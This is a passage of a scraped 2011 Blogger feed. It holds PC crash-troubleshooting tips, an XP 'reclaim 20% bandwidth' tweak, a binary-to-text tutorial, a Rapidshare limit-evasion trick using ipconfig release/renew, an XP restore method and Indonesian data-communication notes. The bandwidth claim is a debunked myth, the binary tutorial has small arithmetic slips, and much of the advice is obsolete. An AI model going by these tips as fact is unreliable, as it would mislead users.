http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
248<br />
Visual basic programming in 12 easy lessons<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
249<br />
Visual Basic programming in 12 easy lessons<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
250<br />
Visual C++ 4 unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
251<br />
Visual C++ programming in 12 easy lessons<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
252<br />
Web database developer's guide with visual basic 5<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
253<br />
Web database developer's guide with visual basic 5<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
254<br />
Web programming desktop reference 6-in-1<br />
http://www.parsian.net/set1252/pages/books.htmAnonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-12736988358473496172011-03-23T15:32:00.000+07:002011-03-23T15:32:15.914+07:0010 reasons why PCs crash U must KnowFatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."<br />
<br />
You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?<br />
<br />
1 Hardware conflict<br />
<br />
The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.<br />
<br />
For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.<br />
<br />
If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:<br />
<br />
* Start-Settings-Control Panel-System-Device Manager.<br />
<br />
Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.<br />
<br />
Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.<br />
<br />
Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).<br />
<br />
When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.<br />
<br />
To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.<br />
<br />
2 Bad Ram<br />
<br />
Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.<br />
<br />
But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.<br />
<br />
One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.<br />
<br />
Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.<br />
<br />
EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.<br />
<br />
3 BIOS settings<br />
<br />
Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.<br />
<br />
Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.<br />
<br />
A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.<br />
<br />
Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).<br />
<br />
4 Hard disk drives<br />
<br />
After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to<br />
<br />
* Start-Programs-Accessories-System Tools-Disk Defragmenter<br />
<br />
This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.<br />
<br />
The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).<br />
<br />
Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to<br />
<br />
* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.<br />
<br />
Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.<br />
<br />
Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to<br />
<br />
* Start-Programs-Accessories-System Tools-ScanDisk<br />
<br />
Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.<br />
<br />
5 Fatal OE exceptions and VXD errors<br />
<br />
Fatal OE exception errors and VXD errors are often caused by video card problems.<br />
<br />
These can often be resolved easily by reducing the resolution of the video display. Go to<br />
<br />
* Start-Settings-Control Panel-Display-Settings<br />
<br />
Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.<br />
<br />
If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to<br />
<br />
* Start-Settings-Control Panel-System-Device Manager<br />
<br />
Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.<br />
<br />
If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.<br />
<br />
The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.<br />
<br />
Another useful way to resolve video problems is to go to<br />
<br />
* Start-Settings-Control Panel-System-Performance-Graphics<br />
<br />
Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).<br />
<br />
Look up your video card's manufacturer on the internet and search for the most recent drivers for it.<br />
<br />
6 Viruses<br />
<br />
Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to<br />
<br />
* Start-Settings-Control Panel-Add/Remove Programs<br />
<br />
Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.<br />
<br />
A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.<br />
<br />
An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).<br />
<br />
7 Printers<br />
<br />
The action of sending a document to print creates a bigger file, often called a postscript file.<br />
<br />
Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.<br />
<br />
If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.<br />
<br />
8 Software<br />
<br />
A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.<br />
<br />
The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.<br />
<br />
Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org<br />
<br />
Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.<br />
<br />
Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.<br />
<br />
Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.<br />
<br />
Remember to restore all the BIOS settings back to their former settings following installation.<br />
<br />
9 Overheating<br />
<br />
Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.<br />
<br />
One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com<br />
<br />
CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.<br />
<br />
10 Power supply problems<br />
<br />
With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.<br />
<br />
If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.<br />
<br />
It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-85731915943899706692011-03-17T12:34:00.000+07:002011-03-17T12:34:49.154+07:00Speed Up Your Bandwidth By 20% !, Windows uses 20% of your bandwidthWindows uses 20% of your bandwidth Here's how to Get it back<br />
<br />
A nice little tweak for XP. Microsoft reserve 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)<br />
<br />
Here's how to get it back:<br />
<br />
Click Start-->Run-->type "gpedit.msc" without the "<br />
<br />
This opens the group policy editor. Then go to:<br />
<br />
<br />
Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth<br />
<br />
<br />
Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :<br />
<br />
"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."<br />
<br />
So the trick is to ENABLE reservable bandwidth, then set it to ZERO.<br />
<br />
This will allow the system to reserve nothing, rather than the default 20%.<br />
<br />
I have tested on XP Pro, and 2000<br />
other o/s not tested.<br />
<br />
Please give me feedback about your resultsAnonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-14372391474177887642011-03-17T12:29:00.001+07:002011-03-17T12:29:29.722+07:00Translating Binary to TextContents<br />
1. Introduction<br />
2. The Binary System<br />
3. Converting Binary to ASCII (Text)<br />
<br />
Introduction:<br />
We’ve all seen binary code. We’ve come to think of them as a bunch of ones and zeroes in long strings…<br />
010010101010101001101011<br />
<br />
But these ones and zeroes can also represent decimal numbers. First off, I will show you how to read these numbers as the decimal numbers we’re used to in our daily life. Then, I will show you how to use those numbers and your keypad to translate them into text. Note that your computer doesn’t use the decimal system, so technically, when it converts binary to text, it doesn’t go through the process I will show you. This is just a divertive way of explaining you how the binary system works.<br />
<br />
The Binary System:<br />
Here’s a simple example of binary:<br />
10101<br />
<br />
Let’s think of the example above as empty slots:<br />
_ _ _ _ _<br />
<br />
First off, you read binary from right-to-left. It’s just the way it’s designed. The first slot from the right represents a value of one, the second from the right a value of two, the third from the right a value of four, the fourth from the right a value of eight, the fifth from the right a value of sixteen, and the cycle continues by multiples of 2. This will never change.<br />
<br />
By putting a 1 or a 0 in those slots you are either saying you want to corresponding value that’s attached to that slot or you don’t. A 1 means yes, and a 0 means no. For example, putting a zero in the first slot from the right, but a 1 in the second slot from the right means you want a two, but not a one:<br />
_ _ _ 1 0<br />
<br />
As such, the number above equals to a decimal value of two.<br />
<br />
As an example, let’s say you want to represent eight in binary form. Well, thinking about the slots, you want the first slot to be 0 because you don’t want a one, you want the second slot to also be 0 because you don’t want a two, you want the third slot to also to be 0 because you don’t want a four, but you want the fifth slot to be 1 because you want a value of eight. As such, eight in binary form is:<br />
1 0 0 0 (or simply 1000 without those underlines)<br />
<br />
Now it is important to note that the amount of zeroes that precede the first value of one from the left is unimportant. So for example:<br />
1 0 0 0 is the same as 0 0 0 1 0 0 0 (1000 = 000100)<br />
<br />
To get it cleared up, here’s another example:<br />
0 1 is the same as 1<br />
<br />
<br />
Exercises: What do the following equal in decimal terms?<br />
a) 100<br />
b] 000100<br />
c) 100000<br />
d) 0010<br />
<br />
Answers:<br />
a) 4<br />
b] 4<br />
c) 32<br />
d) 2<br />
<br />
If you got the answers above right, then you pretty much understand the basics of binary.<br />
Let’s now understand how to get the corresponding decimal values to the numbers which are not multiples of 2.<br />
<br />
To get the total value of a binary number, add the values corresponding to each slot. So, for example, three in binary would be:<br />
11<br />
<br />
The above corresponds to three because if you add the total values of all the slots, that is to say a one from the slot to the right, and a two from the second slot to the right, then it equals three.<br />
<br />
As another example, let’s say you want to represent 5 in binary terms. Then you would need a value of one to be added to a value of four, and you would not want a value of two:<br />
101 [Reading from the right: 1(one) + 0(two) + 1(four) = five]<br />
<br />
Here’s an additional example:<br />
001011 [Reading from the right: 1(one) + 1(two) + 0(four) + 1(eight) + 0(sixteen) + 0(thirty-two) = eleven)<br />
<br />
<br />
<br />
Exercises: What do the following equal in decimal terms?<br />
a) 11011<br />
b] 110<br />
c) 010101<br />
d) 10110<br />
<br />
Answers:<br />
a) 27<br />
b] 6<br />
c) 21<br />
d) 22<br />
<br />
If you got the above questions correct [without cheating], then you essentially understand the binary system. Understanding the binary system was the hard part. What follows is pretty easy.<br />
<br />
3. Converting Binary to ASCII (Text)<br />
ASCII is essentially the letters, numbers and symbols that are stored in our computers through the use of fonts. When the keyboard relays the buttons you pressed, it sends in a code which is then converted to the ASCII equivalent of “k” or “5” or whatever key you pressed.<br />
<br />
Here’s an example of a message “hidden” in binary text:<br />
0100100001100101011011000110110001101111<br />
<br />
Now there are only so many letters, numbers and symbols stored for ASCII. Having sets of 8 digits for their binary equivalent is more than enough to represent all of these letters and the like. As such, all strings that represent text like in the above are separated into bits of 8 for simplicity:<br />
01001000 01100101 01101100 01101100 01101111<br />
<br />
Okay, so our example message was separated into 8 digit strings. The decimal value for each of these strings in the example was calculated for you.<br />
01001000 = 72<br />
01100101 = 101<br />
01101100 = 108<br />
01101100 = 108<br />
01101111 = 111<br />
<br />
The result was 72,101,108,108,111. Now, there is something called the ASCII table. It essentially corresponds to the binary numbers from yore to the equivalent letters/symbols/numbers. But since we found the decimal values of these binary strings, we can use a major shortcut.<br />
<br />
By pressing ALT + [The Number], you will get the ASCII equivalent of that number. For example, by pressing the ALT key and at then (while keeping it down) the numbers 72 in any text editor, you will get the corresponding “H” to show up.<br />
<br />
Let’s do so for the entire example message:<br />
72 = H<br />
101 = e<br />
108 = l<br />
108 = l<br />
111 = o<br />
<br />
So the entire “hidden” message translates to “Hello”.<br />
<br />
<br />
Exercise: Decode the following message<br />
010000110110111101101110011001110111001001100001011101000111010101101100011000010111010001<br />
101001011011110110111001110011 00100001<br />
<br />
Hint: The first step on your way to decoding the message (separated into bytes for you)<br />
01000011 01101111 01101110 01100111 01110010 01100001 01110100 01110101 01101100 01100001 01110100 01101001 01101111 01101110 01110011 00100001<br />
<br />
<br />
PS. Please note that this is the information as I've come to understand it. As such, it's somewhat easier to understand, but it may not necessarily be accurate. In other words, if another source contradicts what has been indicated here, that source is probably right. This text was completely written up by me, with no other sources for aid. If you wish to distribute this text, feel free to do so, but I would appreciate it if you contacted me first.Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-87649256513175023002011-03-17T12:27:00.001+07:002011-03-17T12:27:33.789+07:00Unlimited Rapid Share DownloadIts very easy to fool Rapid Share server if your IP address is assigned by your ISP. Just follow these simple steps:<br />
<br />
clean up IE or netscape cookie( In this case the one that belong to rapidshare website)<br />
On Command prompt<br />
type -----> ipconfig /flushdns <---Enter<br />
type -----> ipconfig /release <---Enter<br />
type -----> ipconfig /renew <---Enter<br />
type -----> exit <--------Enter<br />
<br />
Or save these commands in a bat file and run it everytime you need to fool Rapidshare server.Remember to clean up rapidshare cookie in your temp Internet files folder.<br />
<br />
Now you should be ready to download as many files as you want from their server.<br />
<br />
And there is this cool link: paste it in the browser and see<br />
CODE<br />
http://www.google.com/search?lr=&as_qdr=all&q=+.rar+OR+.zip+OR+.pdf+OR+.exe+site%3Arapidshare.deAnonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-44175126891596351852011-03-17T12:24:00.001+07:002011-03-17T12:24:55.197+07:00XP Auto Instal Hello friends<br />
<br />
May be this might be useful. I install 98 with backup/restore utility.<br />
<br />
My way of auto installation of XP.<br />
Then on second partition or the same partition XP without pagefile.sys.<br />
<br />
Then i get a dual boot. So after booting into XP, Install all ur fav progies<br />
n games. Test each of them, to make sure they work... etc etc... all<br />
ur drivers also. Tweak ur xp.<br />
<br />
make sure u unhide all files relates to win xp dir and progra files.<br />
<br />
Then boot into 98 > goto backup utility of 98.<br />
<br />
Select the folders used by XP, eg<br />
my documents and settings<br />
winxp (or windows- what ever name u gave to windows dir)<br />
check all files in the root<br />
program files folder<br />
and like this all folders and files used by xp.<br />
<br />
then start the backup process.<br />
<br />
make sure u have ~ > 3gb of free space on the disk / partition<br />
u r planning to save the image file.<br />
<br />
Then when ur XP crashes or U crash it ... lol<br />
then just boot into 98, goto restore option,<br />
and click ok. Over write old files or new ones as u like.<br />
<br />
It takes ~20min to install<br />
<br />
Windows Xp including<br />
<br />
Office Xp<br />
Interdev<br />
.net framework<br />
winzip<br />
winrar<br />
tweaks<br />
easy cleaner<br />
adobe<br />
gif animator<br />
acdess 6<br />
service pack1 , and now service pack 2b<br />
lan settings<br />
mcafee antivirus<br />
zone alarm<br />
cute ftp3 pro<br />
Easy CD-DA Extractor 7<br />
Eraser<br />
Ahead<br />
Links Organizer<br />
Bulk Rename Utility<br />
BitStrike Software<br />
Mozilla Firefox<br />
Microsoft Visual Studio<br />
Opera<br />
Onlinetimer<br />
Nokia<br />
Ulead Systems<br />
UltraISO<br />
Virtual CD v4<br />
SlimBrowser<br />
Yahoo!<br />
Msn<br />
Webroot<br />
Spamihilator<br />
inetpub<br />
<br />
U can exclude any folder, u think is not needed at that time for reinstallation.<br />
<br />
The whole task id completed in 20 minutes ... in the mean while<br />
I make a nice cup of tea for myself and wait for XP to start<br />
<br />
PS: dont forget to include boot.ini file.<br />
Hope it will help.Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-1338418137726293472011-03-14T09:44:00.000+07:002011-03-16T20:04:36.109+07:00Komunikasi data<h3>PENDAHULUAN KOMUNIKASI DATA</h3><span style="white-space: pre;"> </span>Pada dasarnya komunikasi data merupakan proses pengiriman informasi diantara dua itik menggunakan kode biner melewati saluran transmisi dan peralatan switching, bisa antara komputer dan komputer, komputer dengan terminal, atau komputer dengan peralatan, atau peratalan dengan peralatan. Awal tahun 1980 menjadi tonggak revolusi komunikasi data yang menjadikan jaringan komputer global sebagai media komunikasi yang kemudian berkembang pesat. Komputer di rumah dapat dihubungkan dengan internet untuk berkomunikasi dan mencari informasi ke seluruh dunia tanpa perlu pergi ke kantor pos atau perpustakaan, electronic-tellermachine dapat membantu agar para nasabah bank leluasa bertransaksi dimanapun tempatnya tanpa repot pergi ke kantor bank, dan banyak lagi contoh lainnya.<br />
<span style="white-space: pre;"> </span>Komputer dan peralatan pendukungnya pada dewasa ini telah menjadi sarana komunikasi yang cukup efisien dengan kemampuan pengolah data yang paling luas penggunaannya, maka tidak ada bentuk informasi yang tidak dapat ditangani oleh komputer beserta perlengkapannya. Oleh karena itu sarana telekomunikasi dewasa ini akan mengarah kepada komunikasi data dengan komputer sebagai peran sentral, suatu saat komunikasi data dapat menggantikan sarana komunikasi konvensional yang ada saat ini.<br />
<br />
<h3>Bentuk Komunikasi Elektronik</h3><span style="white-space: pre;"> </span>a. Komunikasi Suara<br />
<span style="white-space: pre;"> </span>b. Komunikasi Berita dan Gambar<br />
<span style="white-space: pre;"> </span>c. Komunikasi Data<br />
<br />
<h3>Pengertian Komunikasi Data, Telekomunikasi dan Pengolahan Data</h3>Komunikasi data merupakan gabungan dari teknik telekomunikasi dengan teknik pengolahan data.<br />
· Telekomunikasi adalah segala kegiatan yang berhubungan dengan penyaluran informasi dari titik ke titik yang lain;<br />
· Pengolahan data adalah segala kegiatan yang berhubungan dengan pengolahan data;<br />
· Gabungan kedua tehnik ini selain disebut dengan komunikasi data juga disebut dengan teleprocessing (pengolahan jarak jauh);<br />
· Secara umum komunikasi data dapat dikatakan sebagai proses pengiriman informasi (data) yang telah diubah dalam suatu kodetertentu yang telah<br />
disepakati melalui media listrik atau elektro-optik dari titik ke titik yang lain;<br />
· Sistem komunikasi data adalah jaringan fisik dan fungsi yang dapat mengakses komputer untuk mendapatkan fasilitas seperti menjalankan<br />
program, mengakses basis data, melakukan komunikasi dengan operator lain, sedemikian rupa sehingga semua fasilitas berada pada terminalnya walaupun secara fisik berada pada lokasi yang terpisah.<br />
<br />
Pemikiran Dalam Komunikasi Data<br />
· Menyalurkan informasi secepat mungkin dengan kesalahan sedikit mungkin;<br />
· Mengintegrasikan semua jenis komunikasi menjadi satu sistem, yaitu ISDN<br />
(Integrated Service Digital Network ) atau Jaringan Digital Pelayanan Terpadu;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBrHFUzE6PgR54mCPyQnBpPnQWD08U0JwjbLMnTcEPjE9kSEN-tSSBfXfXgSmv4f2wut3eF_rE50vWfC55V2BJLH7Aq5KU-BJF6QRr2mJpkJpAjTG9TZMa9H254DrhQPQUmZDFzI3JrqI/s1600/kdata1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBrHFUzE6PgR54mCPyQnBpPnQWD08U0JwjbLMnTcEPjE9kSEN-tSSBfXfXgSmv4f2wut3eF_rE50vWfC55V2BJLH7Aq5KU-BJF6QRr2mJpkJpAjTG9TZMa9H254DrhQPQUmZDFzI3JrqI/s320/kdata1.jpg" width="320" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<h3>Keuntungan Komunikasi Data</h3>a. Pengumpulan dan persiapan data<br />
Bila pada saat pengumpulan data digunakan suatu terminal cerdas maka waktu untuk pengumpulan data dapat dikurangi sehingga dapat mempercepat proses (menghemat waktu).<br />
b. Pengolahan data<br />
Karena komputer langsung mengolah data yang masuk dari saluran transmisi (efesiensi).<br />
c. Distribusi<br />
Dengan adanya saluran transmisi hasil dapat langsung dikirim kepada pemakai yang memerlukannya.<br />
<br />
<h3>Tujuan Komunikasi Data</h3>a. Memungkinkan pengiriman data dalam jumlah besar efesien, tanpa kesalahan dan ekonomis dari suatu tempat ketempat yang lain;<br />
b. Memungkinkan penggunaan sistem komputer dan peralatan pendukung dari jarak jauh (remote computer use);<br />
c. Memungkinkan penggunaan komputer secara terpusat maupun secara tersebar sehingga mendukung manajemen dalam hal kontrol, baik desentralisasi maupun sentralisasi;<br />
d. Mempermudah kemungkinan pengelolaan dan pengaturan data yang ada dalam berbagai macam sistem komputer;<br />
e. Mengurangi waktu untuk pengolahan data;<br />
f. Mendapatkan data langsung dari sumbernya (mempertinggi kehandalan);<br />
g. Mempercepat penyebarluasan informasi.<br />
<br />
<h3>Faktor - faktor pertimbangan Komunikasi Data</h3>a. Pengsinyalan<br />
Pengsinyalan (signalling) adalah suatu prosedur atau protokol yang harus dilaksanakan terlebih dahulu sebelum pengiriman informasi dimulai.<br />
b. Transmisi<br />
Media transmisi harus efesien dan dapat melayani berbagai jenis alat.<br />
Karakteristik transmisi :<br />
- lebar frekwensi yang dapat ditampung<br />
- redaman<br />
- daya yang dapat ditampung<br />
- waktu yang dibutuhkan<br />
c. Cara Penomoran<br />
Penomoran harus unik dan mengikuti rekomendasi atau persetujuan dari pihak tertentu.<br />
d. Cara menyalurkan hubungan (routing)<br />
Menentukan policy ( kebijaksanaan ) bagaimana suatu hubungan akan dilaksanakan.<br />
e. Cara menghitung biaya (tarif)<br />
Menentukan struktur harga bagi jasa pelayanan yang harus dibayarkan.<br />
<br />
<h3>Bidang-bidang Operasi Komunikasi Data</h3>a. Bidang Data Collection<br />
Data dapat dikumpulkan dari beberapa tempat (remote station), disimpan dalam memori dan pada waktu - waktu tertentu data tersebut akan diolah.<br />
Contoh : aplikasi inventori, penggajian, dll.<br />
b. Bidang Inquiry and Response<br />
Pemakai dapat mengakses langsung ke file atau program. Data yang didikirimkan ke sistem Komputer dapat langsung diproses dan hasilnya dapat segera diberikan. Bila pemakai melakukan dialog dengan komputer maka sistem semacam ini disebut interaktif.<br />
Contoh : aplikasi perbankan, pembayaran dipertokoan.<br />
c. Bidang Storage and Retrival<br />
Data yang sebelumnya disimpan dalam komputer dapat diambil sewaktu - waktu oleh pihak yang berkepentingan.<br />
Contoh : aplikasi Message Switcing dan E-Mail.<br />
d. Bidang Time Sharing<br />
Sejumlah pemakai dapat mengerjakan programnya secara bersama-sama. Setiap pemakai diberikan kesempatan untuk bekerja selama jangka waktu tertentu yang tetap besarnya, setelah itu pemakai lain akan mendapatkan kesempatan. Kalau terlalu banyak data yang harus dikerjakan dalam satu satuan waktu fasilitas roll in-roll out harus dipergunakan.<br />
Contoh : aplikasi pemakai sistem komputer secara bersama untuk pengembangan perangkat lunak (software), perhitungan, rekayasa, pengolah kata (word processing), CAD (computer aided design), dan sebagainya.<br />
e. Bidang Remote Job Entry<br />
Remote Job terminal mengirimkan program atau data (teks) untuk disimpan ke komputer pusat tempat data diproses. Program itu akan dikerjakan secara batch, yaitu diolah setelah gilirannya tiba.<br />
Contoh : aplikasi yang menggunakan peralatan sistem komputer yang tempatnya berjauhan.<br />
f. Bidang Real Time Data Processing and Process Control<br />
Hasil proses dikehendaki dalam waktu yang sesuai dengan kepentingan proses tersebut (real time).<br />
Contoh : aplikasi pengaturan peralatan industri, sistem kendali proses, sistem<br />
telekomunikasi, dsb.<br />
g. Bidang Data Exchange Among Computers<br />
Pertukaran data berupa program, file dan sebagainya antar sistem komputer. Pada aplikasi ni data yang dipertukarkan jumlahnya banyak dan waktu yang dikehendaki singkat sekali.<br />
<h3><span style="font-size: small;"><b>Prinsip Komunikasi data</b></span></h3><h3 class="post-title entry-title"> Prinsip Komunikasi Data </h3><div class="post-header"></div><div class="MsoNormal" style="text-align: justify;">Teknologi jaringan yang menghubungkan komputer baik dalam area kecil maupun besar mempunyai aturan-aturan atau prinsip baku dalam komunikasi data. Komunikasi merupakan proses penyampaian pesan dari seseorang kepada orang lain sehingga terjadi pengertian yang sama. Untuk mencapai pengertian yang sama ini digunakan bahasa yang dimengerti. Dalam komunikasi data jaringan diperlukan penerjemah (interpreter) yang disebut dengan Protokol. ISO (International Standard Organization) membuat aturan baku sebagai prinsip komunikasi data dengan nama model referensi OSI (Open System Interconnection). Dengan adanya model OSI ini semua vendor perangkat telekomunikasi memiliki pedoman dalam mengembangkan protolcolnya.</div><div class="MsoNormal" style="text-align: justify;"> Model OSI terdiri dari 7 lapisan, yaitu: 4 lapisan fisik berorientasi pada jaringan dan 3 lapisan berorientasi pada pemakai atau aplikasi. 4 lapisan pertama OSI berfungsi untuk membawa data tanpa cacat antara 2 lokasi. 3 lokasi berikutnya merupakan nilai tambah dari OSI. Berikut ini uraian dari 7 lapisan OSI:</div><ol start="1" style="margin-top: 0cm;" type="a"><li class="MsoNormal" style="text-align: justify;">Lapisan fisik</li>
</ol><div class="MsoNormal" style="margin-left: 36pt; text-align: justify;">Berupa kabel listrik beserta rumusan besaran elektrik lainya</div><ol start="2" style="margin-top: 0cm;" type="a"><li class="MsoNormal" style="text-align: justify;">Lapisan link data</li>
</ol><div class="MsoNormal" style="margin-left: 36pt; text-align: justify;">Berupa lapisan yang mengatur arus bit antar peralatan komunikasi</div><ol start="3" style="margin-top: 0cm;" type="a"><li class="MsoNormal" style="text-align: justify;">Lapisan jaringan</li>
</ol><div class="MsoNormal" style="margin-left: 36pt; text-align: justify;">Berupa lapisan yang membawa paket bit ke tujuan</div><ol start="4" style="margin-top: 0cm;" type="a"><li class="MsoNormal" style="text-align: justify;">Lapisan transport</li>
